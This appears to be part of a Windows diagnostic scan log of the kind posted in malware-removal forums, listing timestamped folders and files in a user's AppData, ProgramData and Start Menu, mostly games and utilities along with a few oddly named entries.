[28/06/2017 23:46:33] - |D| - [3965592] - C:\Users\PC\AppData\Local\2K Games
[06/12/2014 20:41:10] - |D| - [41509981] - C:\Users\PC\AppData\Local\Adobe
[03/01/2017 16:47:38] - |D| - [1000] - C:\Users\PC\AppData\Local\Altis_Life_France
[17/01/2017 23:30:18] - |D| - [14297814] - C:\Users\PC\AppData\Local\AMD
[26/11/2014 13:59:18] - |D| - [5624412677] - C:\Users\PC\AppData\Local\Ankama
[07/11/2014 11:06:49] - |SHD| - [542560809470] - C:\Users\PC\AppData\Local\Application Data
[28/02/2015 20:21:06] - |D| - [4990425] - C:\Users\PC\AppData\Local\ArmA 2
[27/02/2015 19:29:59] - |D| - [151195249] - C:\Users\PC\AppData\Local\ArmA 2 OA
[15/01/2015 20:59:58] - |D| - [30059897] - C:\Users\PC\AppData\Local\Arma 3
[03/01/2017 16:17:43] - |D| - [1352373] - C:\Users\PC\AppData\Local\Arma 3 Launcher
[05/07/2015 20:52:42] - |D| - [68694] - C:\Users\PC\AppData\Local\ATI
[27/06/2017 14:30:21] - |D| - [123] - C:\Users\PC\AppData\Local\Battle.net
[08/07/2017 13:47:21] - |A| - [278509] - C:\Users\PC\AppData\Local\BigFinstock.bin
[26/12/2014 20:18:22] - |D| - [14799] - C:\Users\PC\AppData\Local\Blizzard Entertainment
[03/01/2017 16:18:08] - |D| - [3158] - C:\Users\PC\AppData\Local\Bohemia_Interactive
[27/07/2015 11:04:33] - |D| - [5984542] - C:\Users\PC\AppData\Local\CEF
[08/07/2017 13:47:27] - |A| - [70800] - C:\Users\PC\AppData\Local\Config.xml
[18/02/2015 22:13:41] - |D| - [44000050] - C:\Users\PC\AppData\Local\CrashDumps
[07/05/2015 08:50:01] - |D| - [0] - C:\Users\PC\AppData\Local\Diagnostics
[13/02/2016 14:43:15] - |D| - [889] - C:\Users\PC\AppData\Local\Dragouf
[22/05/2015 18:23:14] - |D| - [2602] - C:\Users\PC\AppData\Local\EA Games
[13/04/2016 22:22:05] - |D| - [0] - C:\Users\PC\AppData\Local\ElevatedDiagnostics
[21/01/2017 13:18:12] - |D| - [34389059712] - C:\Users\PC\AppData\Local\Ethash
[06/02/2017 13:37:21] - |D| - [1024839] - C:\Users\PC\AppData\Local\Free Download Manager
[20/02/2017 21:54:50] - |D| - [3803197] - C:\Users\PC\AppData\Local\Gaijin
[07/11/2014 11:57:48] - |A| - [111264] - C:\Users\PC\AppData\Local\GDIPFONTCACHEV1.DAT
[07/11/2014 11:39:59] - |D| - [244072313] - C:\Users\PC\AppData\Local\Google
[07/11/2014 11:06:49] - |SHD| - [1147460] - C:\Users\PC\AppData\Local\Historique
[07/11/2014 12:01:14] - |AH| - [5022302] - C:\Users\PC\AppData\Local\IconCache.db
[08/07/2017 13:47:41] - |A| - [1895384] - C:\Users\PC\AppData\Local\InchDom.bin
[17/03/2015 18:11:30] - |D| - [50131418] - C:\Users\PC\AppData\Local\Introversion
[21/01/2015 16:46:08] - |D| - [7873206] - C:\Users\PC\AppData\Local\Ironfront
[30/08/2016 15:48:51] - |D| - [2160] - C:\Users\PC\AppData\Local\Local
[10/09/2015 18:01:21] - |D| - [0] - C:\Users\PC\AppData\Local\Macromedia
[08/07/2017 13:47:27] - |A| - [5568] - C:\Users\PC\AppData\Local\md.xml
[07/11/2014 11:06:49] - |D| - [172366633] - C:\Users\PC\AppData\Local\Microsoft
[07/11/2014 11:45:24] - |D| - [0] - C:\Users\PC\AppData\Local\Microsoft Help
[08/04/2016 19:15:43] - |D| - [1482002] - C:\Users\PC\AppData\Local\Microsoft Windows
[20/05/2016 16:56:36] - |D| - [242771286] - C:\Users\PC\AppData\Local\Monold
[22/07/2015 21:31:30] - |D| - [15901163] - C:\Users\PC\AppData\Local\Mozilla
[11/11/2016 18:25:00] - |D| - [0] - C:\Users\PC\AppData\Local\My Games
[07/11/2014 17:06:09] - |D| - [0] - C:\Users\PC\AppData\Local\Opera Software
[10/06/2017 11:12:42] - |D| - [142627] - C:\Users\PC\AppData\Local\PAYDAY 2
[20/11/2014 15:25:03] - |D| - [0] - C:\Users\PC\AppData\Local\Programs
[16/01/2017 20:49:49] - |D| - [222769] - C:\Users\PC\AppData\Local\Quadriga Games
[27/06/2017 12:47:47] - |A| - [7625] - C:\Users\PC\AppData\Local\Resmon.ResmonCfg
[11/01/2015 15:04:02] - |D| - [19784170] - C:\Users\PC\AppData\Local\Rockstar Games
[29/08/2016 21:45:13] - |D| - [50892] - C:\Users\PC\AppData\Local\SCRiN
[07/11/2014 17:34:54] - |D| - [0] - C:\Users\PC\AppData\Local\SKIDROW
[07/11/2014 11:41:24] - |D| - [0] - C:\Users\PC\AppData\Local\Skype
[18/07/2015 21:15:38] - |D| - [1926] - C:\Users\PC\AppData\Local\Skyrim
[09/04/2015 10:24:27] - |D| - [804533972] - C:\Users\PC\AppData\Local\Steam
[27/01/2017 15:47:34] - |D| - [688496] - C:\Users\PC\AppData\Local\TeamSpeak 3
[09/04/2016 12:12:11] - |D| - [5379269] - C:\Users\PC\AppData\Local\Temp
[07/11/2014 11:06:49] - |SHD| - [37284119] - C:\Users\PC\AppData\Local\Temporary Internet Files
[19/06/2015 20:06:48] - |D| - [0] - C:\Users\PC\AppData\Local\The Witcher 2
[12/12/2016 21:32:45] - |D| - [1836635] - C:\Users\PC\AppData\Local\TortoiseSVN
[13/07/2017 21:03:02] - |D| - [0] - C:\Users\PC\AppData\Local\TSVNCache
[30/08/2016 15:49:23] - |D| - [253] - C:\Users\PC\AppData\Local\Ubisoft Game Launcher
[07/11/2014 11:07:05] - |D| - [1501116678] - C:\Users\PC\AppData\Local\VirtualStore
[05/06/2015 12:35:16] - |D| - [1037] - C:\Users\PC\AppData\Local\WiFi Guard
[06/12/2015 16:20:50] - |D| - [0] - C:\Users\PC\AppData\Local\World in Conflict
[27/06/2017 19:47:31] - |D| - [556501] - C:\Users\PC\AppData\Local\ZHP
[01/02/2015 16:43:47] - |D| - [347781] - C:\Users\PC\AppData\LocalLow\Adobe
[19/02/2017 18:26:34] - |D| - [1182] - C:\Users\PC\AppData\LocalLow\Jujubee S_A_
[29/04/2017 16:02:37] - |D| - [684] - C:\Users\PC\AppData\LocalLow\Logic Artists
[01/02/2015 16:43:47] - |D| - [338225] - C:\Users\PC\AppData\LocalLow\Microsoft
[12/11/2016 22:33:57] - |D| - [602480] - C:\Users\PC\AppData\LocalLow\Obsidian Entertainment
[21/01/2017 21:30:58] - |D| - [0] - C:\Users\PC\AppData\LocalLow\REBORN
[17/02/2017 20:06:05] - |D| - [12209] - C:\Users\PC\AppData\LocalLow\Red Dot Games
[03/02/2015 14:34:05] - |D| - [313761] - C:\Users\PC\AppData\LocalLow\Sun
[13/02/2016 14:17:21] - |SD| - [0] - C:\Users\PC\AppData\LocalLow\Temp
[13/07/2017 21:04:35] - |D| - [65536] - C:\Users\PC\AppData\LocalLow\uTorrent
[20/01/2015 22:50:37] - |D| - [204097409] - C:\Users\PC\AppData\Roaming\.minecraft
[20/11/2014 15:27:06] - |D| - [67481] - C:\Users\PC\AppData\Roaming\11bitstudios
[07/11/2014 12:00:18] - |D| - [1605508] - C:\Users\PC\AppData\Roaming\Adobe
[11/07/2015 17:12:41] - |D| - [1819428] - C:\Users\PC\AppData\Roaming\AMD
[26/11/2014 15:31:27] - |D| - [1005] - C:\Users\PC\AppData\Roaming\AnkamaCertificates
[26/11/2014 15:30:46] - |D| - [5113] - C:\Users\PC\AppData\Roaming\app
[05/07/2015 20:52:42] - |D| - [0] - C:\Users\PC\AppData\Roaming\ATI
[01/11/2015 12:32:35] - |D| - [312] - C:\Users\PC\AppData\Roaming\BANDISOFT
[24/04/2015 21:03:58] - |D| - [4] - C:\Users\PC\AppData\Roaming\Caribbean!
[28/02/2017 21:42:29] - |D| - [3537] - C:\Users\PC\AppData\Roaming\com
[09/04/2016 23:05:52] - |A| - [109] - C:\Users\PC\AppData\Roaming\D2Info0
[22/05/2016 21:55:05] - |A| - [113] - C:\Users\PC\AppData\Roaming\D2Info1
[07/11/2014 17:03:36] - |D| - [1775010] - C:\Users\PC\AppData\Roaming\DAEMON Tools Lite
[08/07/2017 20:02:34] - |D| - [739999] - C:\Users\PC\AppData\Roaming\Dialer
[13/06/2016 23:50:49] - |D| - [0] - C:\Users\PC\AppData\Roaming\DMCache
[26/11/2014 15:30:44] - |D| - [0] - C:\Users\PC\AppData\Roaming\Dofus
[22/05/2016 21:55:05] - |D| - [3015350] - C:\Users\PC\AppData\Roaming\Dofus Beta
[26/11/2014 19:42:25] - |D| - [0] - C:\Users\PC\AppData\Roaming\Dofus-2
[27/11/2014 16:50:53] - |D| - [0] - C:\Users\PC\AppData\Roaming\Dofus-3
[26/11/2014 15:30:44] - |D| - [1208624] - C:\Users\PC\AppData\Roaming\Dofus2
[09/04/2016 23:05:52] - |A| - [8] - C:\Users\PC\AppData\Roaming\DofusAppId0_1
[10/04/2016 07:40:27] - |A| - [8] - C:\Users\PC\AppData\Roaming\DofusAppId0_2
[12/04/2016 19:05:46] - |A| - [8] - C:\Users\PC\AppData\Roaming\DofusAppId0_3
[22/05/2016 21:55:05] - |A| - [8] - C:\Users\PC\AppData\Roaming\DofusAppId1_1
[22/05/2016 21:55:05] - |D| - [0] - C:\Users\PC\AppData\Roaming\Dofusbeta
[29/01/2017 22:13:28] - |D| - [0] - C:\Users\PC\AppData\Roaming\DofusSteam
[01/02/2017 11:18:31] - |D| - [0] - C:\Users\PC\AppData\Roaming\DofusSteam-2
[09/01/2017 18:57:57] - |D| - [628329] - C:\Users\PC\AppData\Roaming\DVDVideoSoft
[19/06/2016 22:40:54] - |D| - [17739] - C:\Users\PC\AppData\Roaming\FreeArc
[29/01/2015 10:46:38] - |D| - [43008624] - C:\Users\PC\AppData\Roaming\GameRanger
[07/11/2014 11:07:13] - |D| - [0] - C:\Users\PC\AppData\Roaming\Identities
[28/04/2017 13:12:23] - |D| - [1006216] - C:\Users\PC\AppData\Roaming\IDM
[14/06/2017 14:48:20] - |D| - [1040384] - C:\Users\PC\AppData\Roaming\Ie1Servise
[20/01/2015 22:54:22] - |D| - [0] - C:\Users\PC\AppData\Roaming\java
[17/06/2016 19:34:10] - |D| - [3187993] - C:\Users\PC\AppData\Roaming\Kalypso Media
[26/07/2015 20:33:03] - |D| - [1025508] - C:\Users\PC\AppData\Roaming\L.A.Noire
[15/01/2017 22:46:26] - |D| - [460050] - C:\Users\PC\AppData\Roaming\Launcher CSP-IRG
[05/07/2015 20:52:26] - |D| - [0] - C:\Users\PC\AppData\Roaming\library_dir
[03/09/2015 22:50:22] - |D| - [0] - C:\Users\PC\AppData\Roaming\LolClient
[13/11/2014 19:39:48] - |D| - [1013] - C:\Users\PC\AppData\Roaming\Macromedia
[07/11/2014 11:06:49] - |D| - [0] - C:\Users\PC\AppData\Roaming\Media Center Programs
[07/11/2014 11:06:49] - |SD| - [7352507] - C:\Users\PC\AppData\Roaming\Microsoft
[23/12/2014 21:02:02] - |D| - [50329] - C:\Users\PC\AppData\Roaming\Mount&Blade Warband
[07/11/2014 18:48:37] - |D| - [5839] - C:\Users\PC\AppData\Roaming\Mount&Blade With Fire and Sword
[22/07/2015 21:31:30] - |D| - [25628168] - C:\Users\PC\AppData\Roaming\Mozilla
[02/08/2016 13:31:05] - |D| - [46004] - C:\Users\PC\AppData\Roaming\Nero
[28/02/2017 21:57:00] - |D| - [0] - C:\Users\PC\AppData\Roaming\Niodomnidertion
[15/12/2016 21:26:42] - |D| - [0] - C:\Users\PC\AppData\Roaming\Obsidium
[07/11/2014 17:06:08] - |D| - [1132079] - C:\Users\PC\AppData\Roaming\Opera Software
[07/12/2014 15:04:17] - |D| - [2819] - C:\Users\PC\AppData\Roaming\PhotoFiltre 7
[09/04/2016 12:34:29] - |D| - [26] - C:\Users\PC\AppData\Roaming\PlaysTV
[05/07/2015 20:49:07] - |D| - [569249635] - C:\Users\PC\AppData\Roaming\Raptr
[07/11/2014 11:41:35] - |D| - [1217699] - C:\Users\PC\AppData\Roaming\Real
[26/11/2014 15:30:46] - |D| - [0] - C:\Users\PC\AppData\Roaming\Reg
[22/05/2016 21:55:07] - |D| - [0] - C:\Users\PC\AppData\Roaming\Regbeta
[16/02/2017 17:36:28] - |D| - [1307] - C:\Users\PC\AppData\Roaming\Rikoooo
[02/12/2014 21:12:30] - |D| - [21544049] - C:\Users\PC\AppData\Roaming\Riot Games
[11/01/2015 15:04:54] - |RHD| - [5984] - C:\Users\PC\AppData\Roaming\SecuROM
[07/11/2014 11:41:20] - |D| - [251943808] - C:\Users\PC\AppData\Roaming\Skype
[31/05/2015 14:23:28] - |D| - [1024608] - C:\Users\PC\AppData\Roaming\Sleeping Dogs - Definitive Edition
[15/12/2016 21:26:42] - |D| - [138] - C:\Users\PC\AppData\Roaming\SmartSteamEmu
[08/07/2017 13:45:41] - |D| - [406016] - C:\Users\PC\AppData\Roaming\smotri2
[19/09/2015 09:50:58] - |D| - [63586828] - C:\Users\PC\AppData\Roaming\Steam
[12/12/2016 20:36:21] - |D| - [23286] - C:\Users\PC\AppData\Roaming\Subversion
[14/11/2014 11:34:46] - |D| - [2191220938] - C:\Users\PC\AppData\Roaming\The Creative Assembly
[29/12/2014 22:16:45] - |D| - [238911] - C:\Users\PC\AppData\Roaming\Theta
[12/12/2016 20:45:13] - |D| - [6513] - C:\Users\PC\AppData\Roaming\TortoiseSVN
[17/06/2016 19:34:20] - |D| - [14215207] - C:\Users\PC\AppData\Roaming\Tropico 5
[15/10/2015 10:36:20] - |D| - [21164401] - C:\Users\PC\AppData\Roaming\TS3Client
[08/01/2017 18:25:43] - |D| - [3236] - C:\Users\PC\AppData\Roaming\Tunngle
[14/05/2015 18:54:03] - |D| - [181269] - C:\Users\PC\AppData\Roaming\Ubisoft
[13/11/2014 18:39:04] - |D| - [47073437] - C:\Users\PC\AppData\Roaming\uTorrent
[20/04/2015 20:41:59] - |D| - [80971] - C:\Users\PC\AppData\Roaming\vlc
[21/06/2015 12:19:40] - |D| - [12] - C:\Users\PC\AppData\Roaming\WinRAR
[31/01/2015 08:53:49] - |D| - [25358109] - C:\Users\PC\AppData\Roaming\ZHP
[07/11/2014 11:07:25] - |ASH| - [174] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
[22/05/2016 19:29:29] - |A| - [1093] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Dofus Beta.lnk
[07/11/2014 11:06:49] - |SHD| - [84529] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programmes
[07/11/2014 11:06:49] - |RD| - [84529] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
[13/11/2014 18:40:01] - |A| - [825] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
[07/11/2014 11:06:49] - |RD| - [14665] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
[07/11/2014 11:07:25] - |RD| - [174] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
[27/02/2015 18:53:51] - |D| - [27535] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ArmA 2
[21/01/2015 10:13:04] - |D| - [1283] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AWAR
[30/06/2016 03:27:35] - |D| - [1862] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bohemia Interactive
[07/11/2014 11:07:25] - |ASH| - [476] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
[26/11/2014 13:59:19] - |D| - [2364] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dofus2
[05/07/2015 20:12:33] - |A| - [2048] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FileHippo App Manager.lnk
[19/06/2016 22:40:53] - |D| - [0] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FreeArc
[29/01/2015 10:46:44] - |A| - [1015] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GameRanger.lnk
[20/11/2014 11:23:55] - |D| - [1170] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
[19/02/2015 19:46:38] - |D| - [1347] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hearts of iron 3 Their Finest Hour 4.01
[07/11/2014 11:07:39] - |A| - [1425] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
[07/11/2014 11:07:28] - |A| - [1459] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
[24/06/2016 15:17:04] - |D| - [2491] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IVMP
[07/11/2014 11:06:49] - |RD| - [580] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
[20/01/2015 22:53:33] - |D| - [4083] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft
[08/07/2017 20:02:33] - |D| - [0] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Modem X080C Plus
[07/11/2014 18:48:32] - |D| - [0] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mount&Blade With Fire and Sword
[07/12/2014 15:04:15] - |D| - [0] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PhotoFiltre 7
[16/01/2017 20:49:50] - |D| - [5227] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Quadriga Games
[16/02/2017 17:38:05] - |D| - [1249] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons
[20/11/2014 11:34:00] - |D| - [0] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\San Andreas Multiplayer
[07/11/2014 11:07:25] - |RD| - [174] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
[09/04/2015 09:42:11] - |D| - [2253] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
[19/06/2016 18:35:28] - |D| - [3762] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TechPowerUp GPU-Z
[19/12/2015 11:06:08] - |D| - [1015] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Victotria II
[22/01/2015 13:00:26] - |D| - [2651] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder
[07/11/2014 11:39:25] - |D| - [4221] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
[07/11/2014 11:07:25] - |ASH| - [174] - C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini

---------- | [Public]


---------- | C:\ProgramData

[28/02/2017 21:42:17] - |D| - [41574] - C:\ProgramData\22T4545C8369Q363
[28/02/2017 22:03:37] - |HD| - [3110949] - C:\ProgramData\98Y1716E1156F707
[07/11/2014 11:42:47] - |D| - [381036239] - C:\ProgramData\Adobe
[05/07/2015 20:49:02] - |D| - [499359] - C:\ProgramData\AMD
[14/07/2009 05:08:56] - |SHD| - [52962368507] - C:\ProgramData\Application Data
[07/11/2014 11:59:11] - |D| - [112257539] - C:\ProgramData\AVAST Software
[26/12/2014 20:07:38] - |D| - [14004082] - C:\ProgramData\Battle.net
[26/12/2014 20:18:08] - |D| - [1133771] - C:\ProgramData\Blizzard Entertainment
[15/01/2015 20:59:58] - |D| - [0] - C:\ProgramData\Bohemia Interactive
[30/06/2016 14:34:35] - |D| - [0] - C:\ProgramData\Bohemia Interactive Studio
[07/11/2014 11:06:38] - |SHD| - [58968] - C:\ProgramData\Bureau
[19/06/2015 19:55:00] - |D| - [1595620] - C:\ProgramData\Caphyon
[08/07/2017 20:03:34] - |A| - [4320] - C:\ProgramData\Config.dat
[07/11/2014 17:01:49] - |D| - [1598] - C:\ProgramData\DAEMON Tools Lite
[08/07/2016 17:06:17] - |D| - [1430154] - C:\ProgramData\DatacardService
[14/07/2009 05:08:56] - |SHD| - [58968] - C:\ProgramData\Desktop
[14/07/2009 05:08:56] - |SHD| - [92126649] - C:\ProgramData\Documents
[30/12/2014 16:16:06] - |D| - [0] - C:\ProgramData\Electronic Arts
[07/11/2014 11:06:38] - |SHD| - [0] - C:\ProgramData\Favoris
[14/07/2009 05:08:56] - |SHD| - [0] - C:\ProgramData\Favorites
[20/02/2017 21:54:50] - |D| - [26] - C:\ProgramData\Gaijin
[21/01/2017 21:30:49] - |D| - [704580] - C:\ProgramData\GOG.com
[13/06/2016 23:50:50] - |D| - [0] - C:\ProgramData\IDM
[05/07/2015 20:12:37] - |D| - [2718] - C:\ProgramData\IsolatedStorage
[31/01/2015 12:34:06] - |D| - [180884410] - C:\ProgramData\Malwarebytes
[07/11/2014 11:06:39] - |SHD| - [1022249528] - C:\ProgramData\Menu Démarrer
[14/07/2009 03:20:08] - |SD| - [1739357945] - C:\ProgramData\Microsoft
[07/11/2014 11:45:23] - |D| - [65286] - C:\ProgramData\Microsoft Help
[08/07/2016 17:07:46] - |D| - [22517500] - C:\ProgramData\Modem HDM EC156
[07/11/2014 11:06:39] - |SHD| - [0] - C:\ProgramData\Modèles
[07/11/2014 11:39:57] - |D| - [164] - C:\ProgramData\Mozilla
[21/01/2017 13:19:04] - |ASH| - [95578880] - C:\ProgramData\msiqjkfyu.exe
[07/11/2014 11:43:17] - |D| - [0] - C:\ProgramData\Nero
[05/04/2016 15:00:23] - |RASH| - [4666] - C:\ProgramData\ntuser.pol
[20/11/2014 17:39:01] - |D| - [70997662] - C:\ProgramData\Oracle
[30/08/2016 02:21:39] - |D| - [20605561] - C:\ProgramData\Orbit
[29/01/2015 14:33:39] - |D| - [43154] - C:\ProgramData\Origin
[12/11/2016 22:32:39] - |D| - [45216180] - C:\ProgramData\Package Cache
[07/11/2014 11:41:51] - |D| - [2357235] - C:\ProgramData\Real
[29/01/2015 15:52:38] - |D| - [0] - C:\ProgramData\RELOADED
[02/12/2014 21:31:03] - |D| - [39] - C:\ProgramData\Riot Games
[31/01/2015 14:28:20] - |D| - [96471] - C:\ProgramData\RogueKiller
[24/06/2015 14:46:20] - |SHD| - [377372] - C:\ProgramData\SecuROM
[20/06/2015 00:05:23] - |D| - [33740] - C:\ProgramData\SkidRow
[07/11/2014 11:41:14] - |D| - [156434432] - C:\ProgramData\Skype
[07/11/2014 11:29:08] - |D| - [2148] - C:\ProgramData\SonicFocus
[14/07/2009 05:08:56] - |SHD| - [1022249528] - C:\ProgramData\Start Menu
[15/01/2015 20:59:58] - |D| - [4983216] - C:\ProgramData\Steam
[20/11/2014 17:39:23] - |D| - [154] - C:\ProgramData\Sun
[20/11/2014 17:42:35] - |D| - [69] - C:\ProgramData\SystemRequirementsLab
[17/02/2017 19:24:28] - |D| - [0] - C:\ProgramData\TEMP
[14/07/2009 05:08:56] - |SHD| - [0] - C:\ProgramData\Templates
[08/01/2017 18:25:37] - |D| - [21149824] - C:\ProgramData\Tunngle
[14/05/2015 18:21:47] - |D| - [425] - C:\ProgramData\Ubisoft
[30/06/2016 10:07:34] - |D| - [0] - C:\ProgramData\W
[20/02/2017 21:53:37] - |D| - [4] - C:\ProgramData\WarThunder

---------- | C:\ProgramData\Microsoft\Windows\Start Menu

[14/07/2009 05:01:14] - |A| - [1282] - C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk
[14/07/2009 04:49:40] - |ASH| - [442] - C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
[07/11/2014 11:06:39] - |SHD| - [1022246538] - C:\ProgramData\Microsoft\Windows\Start Menu\Programmes
[14/07/2009 03:20:08] - |RD| - [1022246538] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs
[14/07/2009 04:49:40] - |A| - [1266] - C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk

---------- | C:\ProgramData\Microsoft\Windows\Start Menu\Programs

[02/12/2014 20:23:24] - |D| - [6100] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\3D Ripper DX
[09/12/2015 18:02:49] - |D| - [1475] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
[19/05/2015 20:42:36] - |D| - [1429] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AC2 server emulator
[14/07/2009 03:20:08] - |RD| - [44960] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
[13/04/2017 22:56:51] - |A| - [2441] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
[21/01/2017 13:43:54] - |A| - [2441] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
[14/07/2009 05:32:38] - |RD| - [21157] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools
[05/07/2015 20:52:37] - |D| - [2095] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
[17/01/2017 23:26:35] - |D| - [1877] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
[29/12/2014 22:12:55] - |D| - [1363] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Assassins Creed III
[07/11/2014 12:00:03] - |D| - [1976] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\avast! Free Antivirus
[21/01/2015 10:13:04] - |D| - [5679] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AWAR
[01/12/2016 17:38:17] - |D| - [1612] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AZW Reloaded
[01/11/2015 12:32:18] - |D| - [3092] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bandicam
[29/08/2016 15:20:09] - |D| - [2958] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BattleGoat Studios
[14/01/2017 17:28:05] - |D| - [4033] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Best Way Soft
[27/06/2015 14:56:33] - |D| - [1812] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks
[04/12/2016 23:37:46] - |D| - [1948] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blood and Iron Age of Imperialism
[30/06/2016 03:27:35] - |D| - [1564] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bohemia Interactive
[31/01/2015 17:36:19] - |D| - [922] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
[03/07/2017 18:50:40] - |D| - [10824] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cheat Engine 6.6
[29/01/2015 15:45:23] - |D| - [5429] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chivalry Medieval Warfare
[17/02/2017 19:19:50] - |A| - [651] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\City Car Driving.lnk
[21/11/2014 15:02:13] - |D| - [2908] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Company of Heroes 2
[04/03/2015 13:26:39] - |D| - [2601] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Crusader Kings II
[29/12/2014 20:10:58] - |D| - [1552] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Crusader Kings II - Collection
[10/03/2017 18:43:28] - |D| - [1353] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Crusader Kings II Monks and Mystics
[07/11/2014 17:04:06] - |D| - [3257] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Lite
[14/07/2009 04:54:23] - |ASH| - [1130] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
[09/01/2017 18:59:11] - |D| - [6861] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVDVideoSoft
[29/08/2016 13:57:54] - |D| - [2238] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Europa Universalis 4
[23/02/2015 21:24:24] - |D| - [1917] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Europa Universalis IV - Collection
[18/10/2016 18:54:04] - |D| - [2397] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Europa Universalis IV Rights of Man
[17/06/2017 16:49:00] - |D| - [1307] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Europa Universalis IV Third Rome
[29/04/2017 15:59:47] - |D| - [1420] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Expeditions Viking
[06/02/2017 13:37:20] - |D| - [2376] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Download Manager
[19/06/2016 22:40:53] - |D| - [12245] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeArc
[14/07/2009 05:32:38] - |RD| - [8940] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
[28/11/2015 15:32:02] - |D| - [22696] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOG.com
[07/11/2014 11:40:21] - |A| - [2193] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
[24/06/2015 13:09:15] - |D| - [3544] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Grand Theft Auto IV - Episodes From Liberty City
[12/07/2015 00:31:24] - |D| - [3236] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hard Time
[15/06/2017 02:19:45] - |D| - [1342] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hearts of Iron IV Death or Dishonor
